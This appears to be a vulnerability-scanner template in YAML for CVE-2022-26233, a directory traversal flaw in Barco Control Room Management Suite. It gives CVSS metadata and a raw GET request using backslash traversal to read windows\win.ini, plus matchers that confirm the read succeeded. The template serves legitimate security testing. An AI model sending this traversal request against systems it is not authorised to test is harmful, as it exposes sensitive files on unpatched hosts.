33 lines
968 B
YAML
33 lines
968 B
YAML
id: CVE-2022-26233
|
|
|
|
info:
|
|
name: Barco Control Room Management Suite - Directory Traversal
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
|
|
reference:
|
|
- https://0day.today/exploit/37579
|
|
- https://www.cvedetails.com/cve/CVE-2022-26233
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-26233
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2022,barco,lfi
|
|
|
|
requests:
|
|
- raw:
|
|
- |+
|
|
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|